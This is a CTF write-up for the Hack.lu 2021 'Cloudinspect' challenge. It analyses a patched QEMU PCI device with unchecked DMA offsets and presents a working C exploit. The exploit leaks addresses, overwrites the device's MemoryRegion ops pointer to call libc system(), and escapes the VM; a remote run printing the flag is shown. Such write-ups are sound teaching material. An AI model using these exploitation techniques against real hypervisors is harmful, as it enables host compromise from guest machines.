Posts Hack.lu CTF 2021 - Cloudinspect [Pwn]
Post
Cancel

Hack.lu CTF 2021 - Cloudinspect [Pwn]

NOTE: The following is a writeup for the solution we developed independently for this challenge after the end of the competition.

Cloudinspect was a pwn challenge during Hack.lu CTF 2021 that got 14 solves. We are given a patched qemu-system-x86_64 binary, the patch itself as a diff file, and a Linux kernel and filesystem to launch with the qemu binary (initramfs.cpio.gz and vmlinuz-5.11.0-38-generic). Additionaly, we have some shell scripts to launch the VM and rebuild qemu.

The qemu patch adds a new emulated PCI device that will be available from the machine. You can read the added code here. This emulated device runs as a part of qemu’s process, meaning that if we can exploit it, we can very likely escape the VM, which is the target of this challenge.

Code analysis

The device gets declared through several functions we do not really care about. Then the device registers a memory region so the guest OS can interact with it via memory-mapped IO (MMIO):

1
2
3
4
5
6
7
8
9
10
11
12
static void pci_cloudinspect_realize(PCIDevice *pdev, Error **errp) {
	CloudInspectState *cloudinspect = CLOUDINSPECT(pdev);

	if (msi_init(pdev, 0, 1, true, false, errp)) {
		return;
	}

	cloudinspect->as = &address_space_memory;
	memory_region_init_io(&cloudinspect->mmio, OBJECT(cloudinspect), &cloudinspect_mmio_ops, cloudinspect,
					"cloudinspect-mmio", 1 * MiB);
	pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &cloudinspect->mmio);
}

From the qemu docs:

MMIO: a range of guest memory that is implemented by host callbacks; each read or write causes a callback to be called on the host. You initialize these with memory_region_init_io(), passing it a MemoryRegionOps structure describing the callbacks.

The device emulation objects will use memory_region_init_io() to install their MMIO handlers, and pci_register_bar() to associate those handlers with a PCI BAR, as they do within QEMU currently.

The function prototype for memory_region_init_io is:

1
2
3
4
5
6
7
8
void memory_region_init_io(
    MemoryRegion *mr,
    Object *owner,
    const MemoryRegionOps *ops,
    void *opaque,
    const char *name,
    uint64_t size
)

Note that the state structure itself (cloudinspect) is passed as the opaque parameter, as this will be useful later. The CloudInspectState and cloudinspect_mmio_ops structures have the following layout:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#define DMA_SIZE 4096

struct CloudInspectState {
	PCIDevice pdev;
	MemoryRegion mmio;
	AddressSpace *as;

	struct dma_state {
		dma_addr_t src;
		dma_addr_t dst;
		dma_addr_t cnt;
		dma_addr_t cmd;
	} dma;
	char dma_buf[DMA_SIZE];
};

static const MemoryRegionOps cloudinspect_mmio_ops = {
	.read = cloudinspect_mmio_read,
	.write = cloudinspect_mmio_write,
	.endianness = DEVICE_NATIVE_ENDIAN,
	.valid = {
		.min_access_size = 4,
		.max_access_size = 8,
	},
	.impl = {
		.min_access_size = 4,
		.max_access_size = 8,
	},

};

Whenever we interact with the PCI device via MMIO, qemu will call cloudinspect_mmio_ops->read (cloudinspect_mmio_read) and cloudinspect_mmio_ops->write (cloudinspect_mmio_write); the opaque value we saw earlier will be passed as their first parameter. Let us take a look at these callbacks.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size) {
	CloudInspectState *cloudinspect = opaque;
	uint64_t val = ~0ULL;

	switch (addr) {
	case 0x00:
		val = 0xc10dc10dc10dc10d;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_CMD:
		val = cloudinspect->dma.cmd;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_SRC:
		val = cloudinspect->dma.src;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_DST:
		val = cloudinspect->dma.dst;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_CNT:
		val = cloudinspect->dma.cnt;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
		val = cloudinspect_DMA_op(cloudinspect, false);
		break;
	}

	return val;
}

static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
	CloudInspectState *cloudinspect = opaque;

	switch (addr) {
	case CLOUDINSPECT_MMIO_OFFSET_CMD:
		cloudinspect->dma.cmd = val;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_SRC:
		cloudinspect->dma.src = val;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_DST:
		cloudinspect->dma.dst = val;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_CNT:
		cloudinspect->dma.cnt = val;
		break;
	case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
		val = cloudinspect_DMA_op(cloudinspect, true);
		break;
	}
}

Both of them look really similar. If we read or write at certain offsets in the memory region corresponding to the vulnerable device, we will be reading or writing to the structure in cloudinspect.dma, which had its layout described above. The only exception is the last case, which triggers a call to cloudinspect_DMA_op. cloudinspect_DMA_op simply checks that cloudinspect->dma.cmd has one of two specified values (it does not matter which), and that cloudinspect->dma.cnt is not greater than DMA_SIZE (4906). It then calls cloudinspect_dma_rw, propagating the second parameter (write):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write) {
	
	if (write) {
		uint64_t dst = cloudinspect->dma.dst;
		// DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
		dma_memory_read(
			cloudinspect->as,
			cloudinspect->dma.src,
			cloudinspect->dma_buf + dst,
			cloudinspect->dma.cnt
		);
	} else {
		uint64_t src = cloudinspect->dma.src;
		// DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
		dma_memory_write(
			cloudinspect->as,
			cloudinspect->dma.dst,
			cloudinspect->dma_buf + src,
			cloudinspect->dma.cnt
		);
	}
}

So far, we know that we can interact with a memory region via MMIO and trigger calls to dma_memory_write and dma_memory_read. The second parameter to each of these functions is a physical address in the guest’s memory, the third one is an address in qemu’s regular virtual address space, and the fourth one is the amount of bytes to be transferred between each.

Interacting with the PCI device

In order to exploit the device, we first must find a way to interact with it. After launching the VM, we can use lspci -v to get a list of available devices:

1
2
3
4
5
6
/ # lspci -v
00:01.0 Class 0601: 8086:7000
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:01.1 Class 0101: 8086:7010
00:02.0 Class 00ff: 1337:1337

The device with ID 1337 looks interesting. In the source code for our device, we find the following defines:

1
2
#define CLOUDINSPECT_VENDORID            0x1337
#define CLOUDINSPECT_DEVICEID            0x1337

Now that we have identified the device, we can list its memory range with /proc/iomem:

1
2
3
4
5
/ # cat /proc/iomem 
...
08000000-febfffff : PCI Bus 0000:00
  feb00000-febfffff : 0000:00:02.0
...

The memory range for device 00:02.0 is feb00000-febfffff. If we map it and read its offset zero, we should see the magic number shown the switch case case in cloudinspect_mmio_read:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#define DEV_ADDR 0xfeb00000
#define MAP_SIZE 0xfffff

typedef uint64_t u64;

u64 read_magic(volatile void* mem) {
	return *(u64*)((uintptr_t)mem);
}

void* map_device(int fd) {
	void* mem;

	mem = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, DEV_ADDR);
	if (mem == MAP_FAILED)
		err(EXIT_FAILURE, "mmap");

	return mem;
}

void unmap_device(volatile void* mem) {
	munmap((void*)mem, MAP_SIZE);
}

int main() {
	int fd;
	volatile void* mem;
	u64 magic;

	fd = open("/dev/mem", O_RDWR | O_SYNC);
	if (fd < 0)
		err(EXIT_FAILURE, "open");
	mem = map_device(fd);

	magic = read_magic(mem);
	assert(magic == 0xc10dc10dc10dc10d);

	unmap_device(mem);
	close(fd);
	return EXIT_SUCCESS;
}

Now that we can interact with the device, it is time to exploit it.

Exploitation

The bug is clear: cloudinspect->dma.cnt is bounded to a maximum of 4096, but cloudinspect->dma.dst and cloudinspect->dma.src are not. This means we can read and write to any location we want outside of cloudinspect->dma_buf when using dma_memory_read and dma_memory_write.

Our first goal is to obtain a memory leak in order to break ASLR. We took the simplest approach: we started printing blocks of 8 bytes, starting at cloudinspect->dma_buf + 4096:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
u64 virt2phys(volatile void* p) {
	/* https://github.com/kitctf/writeups/blob/2af257868242fafef4a204349d22227b62d9b8bb/hitb-gsec-2017/babyqemu/pwn.c#L35 */
}

void write_dst(volatile void* mem, u64 dst) {
	*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_DST) = dst;
}

void write_src(volatile void* mem, u64 src) {
	*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_SRC) = src;
}

void write_cmd(volatile void* mem, u64 cmd) {
	*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_CMD) = cmd;
}

void write_cnt(volatile void* mem, u64 cnt) {
	*(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_CNT) = cnt;
}

u64 read_trigger(volatile void* mem) {
	u64 out;

	write_cmd(mem, CLOUDINSPECT_DMA_GET_VALUE);
	out = *(u64*)((uintptr_t)mem + CLOUDINSPECT_MMIO_OFFSET_TRIGGER);
	if (!out)
		warnx("read_trigger");
	return out;
}

void read_from_dma_buf(volatile void* mem, u64 local_phys, u64 size, u64 off) {
	write_cnt(mem, size);
	write_dst(mem, local_phys);
	write_src(mem, off);
	read_trigger(mem);
}

int main() {
	int fd;
	volatile void* mem;
	volatile void* buf;
	u64 buf_phys;
	u64 i;

	fd = open("/dev/mem", O_RDWR | O_SYNC);
	if (fd < 0)
		err(EXIT_FAILURE, "open");
	mem = map_device(fd);

	buf_phys = virt2phys(buf);
	for (i = 0; i < 100; ++i) {
		read_from_dma_buf(mem, buf_phys, sizeof(u64), DMA_SIZE + (i * 8));
		printf("%lu: 0x%lx\n", i, *(volatile u64*)buf);
	}
	
	unmap_device(mem);
	close(fd);
	return EXIT_SUCCESS;
}

We found the 7th value to be a reliable leak off of which we can calculate the address of any function as an offset of it. However, this leak will not work with heap addresses, as the heap’s base address is randomized for every execution, and it is not mapped at a constant offset from the executable regions in the process. We were not able to get a reliable leak for the heap both locally and remotely, so we resorted to avoid them.

Our strategy at this point is to overwrite a function pointer with the address of libc’s system function; ideally we should also be able to control its first parameter.

CloudInspectState has a field called mmio, which has the type MemoryRegion. We can take a look at this structure’s layout within qemu’s source code:

1
2
3
4
5
struct MemoryRegion {
    const MemoryRegionOps *ops;
    void *opaque;
    /* snip */
};

Every time a read or write is performed on a MMIO region, one of the callbacks in ops is called with opaque as its first parameter. If we can swap the ops pointer to a structure we control, and then make opaque point to a string like /bin/sh, we can escape the VM! Our gameplan is the following:

  1. Read cloudstate.mmio->ops.
  2. Change ops->read to point to libc’s system.
  3. Write our fake ops into dma_buf.
  4. Write the string cat flag at a different offset in dma_buf.
  5. Read cloudstate.mmio.
  6. Patch mmio:
    • Make mmio->ops point to our structure in dma_buf.
    • Make mmio->opaque point to our string in dma_buf.
  7. Write mmio back to its location within cloudstate.
  8. Trigger a read in order for cloudstate.mmio->ops->read to be called.

In order to do this, there are some addresses we need to know:

  1. The address of mmio->ops. We can obtain it from our leak we got earlier, as it does not live in the heap.
  2. The address of libc’s system. We can obtain this from our leak as well.
  3. The address of cloudstate. We need it to obtain the address of dma_buf as an offset from it. We will make mmio->opaque and mmio->ops point to dma_buf; we also need it in order to read/write any absolute address, as the parameter passed to dma_memory_read/dma_memory_write is calculated from cloudstate->dma_buf. Without it, we cannot read mmio->ops even if we know the absolute address.

The key to leaking cloudstate’s address is the fact that cloudstate.mmio->opaque contains a pointer to it (as seen in pci_cloudinspect_realize). Therefore, we can overflow the 64-bit addition in cloudinspect_dma_rw (cloudinspect->dma_buf + src) in order to read at a negative offset from dma_buf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/*
 struct CloudInspectState {
	PCIDevice pdev;
	MemoryRegion mmio;     <--- mmio->opaque at offset 80
	AddressSpace *as;

	struct dma_state {
		dma_addr_t src;
		dma_addr_t dst;
		dma_addr_t cnt;
		dma_addr_t cmd;
	} dma;
	char dma_buf[DMA_SIZE]; <--- cloudinspect->dma_buf + src => overflow
};
*/

/*
 * (gdb) print sizeof(PCIDevice)
 * $1 = 2288
 * (gdb) print sizeof(MemoryRegion)
 * $5 = 240
 */
#define PCIDEVICE_STRUCT_SIZE 2288
#define MEMORYREGION_SIZE     240

static u64 qemu_system = 0;
static u64 ops_addr = 0;
static u64 cloudstate_addr = 0;
static u64 mmio_addr = 0;
static u64 dma_buf_addr = 0;

volatile void* map_buf() {
	volatile void* out;

	out = mmap(NULL, DMA_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (out == MAP_FAILED)
		err(EXIT_FAILURE, "mmap");
	memset((void*)out, 0, DMA_SIZE);

	return out;
}

void unmap_buf(volatile void* buf) {
	munmap((void*)buf, DMA_SIZE);
}

void get_leaks(volatile void* mem) {
	volatile void* buf;
	u64 buf_phys;

	buf = map_buf();
	buf_phys = virt2phys(buf);

	read_from_dma_buf(mem, buf_phys, sizeof(u64), DMA_SIZE + (6 * 8));
	leak = *(volatile u64*)buf;
	qemu_system = leak - 0x37b7b0;
	ops_addr = leak + 0x663a10;

	/* We set `src` to be a negative value, which becomes a big value when casted to unsigned */
	read_from_dma_buf(mem, buf_phys, sizeof(u64), (u64)(-((5 * 8) + (MEMORYREGION_SIZE - 80))));
	cloudstate_addr = *(u64*)buf;
	mmio_addr = cloudstate_addr + PCIDEVICE_STRUCT_SIZE;
	dma_buf_addr = cloudstate_addr + PCIDEVICE_STRUCT_SIZE + MEMORYREGION_SIZE + (5 * 8);

	unmap_buf(buf);
}

Of course, in order to replace the fields we want, we need to have similar structures to the one qemu uses:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* Replacement for MemoryRegionOps. Size=80 */
struct FakeRegionOps {
	volatile void* read;
	volatile void* write;
	volatile unsigned char b[80 - 16];
};

/*
 * Replacement for MemoryRegion.
 * (gdb) print (int)&((struct MemoryRegion*)0)->ops
 * $3 = 72
 * (gdb) print (int)&((struct MemoryRegion*)0)->opaque
 * $4 = 80
 * (gdb) print sizeof(struct MemoryRegion)
 * $5 = 240
 */
struct FakeRegion {
	unsigned char p[72];
	const struct FakeRegionOps *ops;
	void *opaque;
	unsigned char b[240 - 16 - 72];
};

Combining all the pieces, we are able to execute our gameplan above. You can find our full exploit here.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ { stat -c "%s" solve; sleep 1; cat solve; } | nc flu.xxx 20065
...
magic=c10dc10dc10dc10d
leak: 0x55f73a523510
cloudstate @ 0x55f73c312380
cloudstate->dma_buf @ 0x55f73c312d88
old ops->read: 0x55f73a221480
new ops->read: 0x55f73a1a7d60
> Writing fake_ops to dma_buf
> Writing shell to dma_buf
> Reading mmio
old mmio->ops: 0x55f73ab86f20
old mmio->opaque: 0x55f73c312380
new mmio->ops: 0x55f73c312d88
new mmio->opaque: 0x55f73c312dd8
> Writing fake mmio
> Triggering mmio read
flag{cloudinspect_inspects_your_cloud_0107}
This post is licensed under CC BY 4.0 by the author.
Contents